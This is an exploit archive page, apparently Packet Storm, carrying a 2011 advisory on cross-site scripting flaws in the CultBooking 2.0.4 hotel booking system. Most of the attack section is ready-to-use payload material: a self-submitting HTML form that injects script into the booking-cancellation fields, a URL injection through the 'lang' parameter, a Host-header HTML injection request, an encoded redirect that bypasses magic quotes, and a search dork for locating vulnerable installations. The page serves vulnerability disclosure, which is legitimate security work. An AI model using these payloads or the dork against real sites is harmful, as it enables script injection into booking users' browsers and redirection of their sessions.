what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

CultBooking 2.0.4 Cross Site Scripting

CultBooking 2.0.4 Cross Site Scripting
Posted Jan 24, 2011
Authored by LiquidWorm | Site zeroscience.mk

CultBooking version 2.0.4 suffers from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 24e1154c89c42c178796c636bb67c5e08c8ad7b7e1f4211c0ba0b0ae79186a25

CultBooking 2.0.4 Cross Site Scripting

Change Mirror Download
<!--

CultBooking 2.0.4 (cultbooking.php) Multiple XSS/PD Vulnerabilities


Vendor: Cultuzz Digital Media GmbH
Product web page: http://www.cultuzz.com
Affected version: 2.0.4

Summary: Open source hotel booking system (Internet Booking Engine (IBE)). Via a
central api called CultSwitch it is possible to make bookings and set the actual
availabilities in the hotels pms. This is easy to install and easy to integrate
with full support.

Desc: CultBooking Hotel Booking System suffers from a XSS/PD vulnerability when
parsing user input to the 'bookingcode', 'email' and 'lang' parameter via POST
and GET methods in cultbooking.php script. Attackers can exploit this weakness
to execute arbitrary HTML and script code in a user's browser session.

Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41

Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk

Advisory ID: ZSL-2011-4987
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4987.php

16.01.2011

-->


Dork: "inurl:cultbooking.php"

<script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script>
<form action="http://1.1.1.2/cultbooking.php" enctype="application/x-www-form-urlencoded" id="xss" method="POST">
<input type="hidden" name="agentsine" value="10492">
<input type="hidden" name="agentdutycode" value ="1429741cfe1700d7">
<input type="hidden" name="lang" id="lang" value="en">
<input type="hidden" name="hcode" value="11225">
<input type="hidden" name="action" value="cancelbooking">
<input type="hidden" name="email" value='"><script>alert(2)</script>' />
<input type="hidden" name="bookingcode" value='"><script>alert(1)</script>' />
</form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit!<h3></center></font></b></a>


http://1.1.1.2/cultbooking.php?lang=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E


HTML Injection via Header Attack:
---------------------------------------------------------------------
POST http://1.1.1.2/cultbooking.php HTTP/1.1
Host: "><zsl><h1>ZSL-CROSS-SCRIPT-EXECUTED"
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.8) Gecko/2008101401 Firefox/3.1
Accept-Encoding: gzip,deflate
Keep-Alive: 50
Connection: Keep-Alive

action=cancellation
---------------------------------------------------------------------
Affected Header variable: Host


magic quotes bypass redirect:
http://1.1.1.2/cultbooking.php?lang="><script>document.location.href=String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 122, 101, 114, 111, 115, 99, 105, 101, 110, 99, 101, 46, 109, 107);</script>

Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close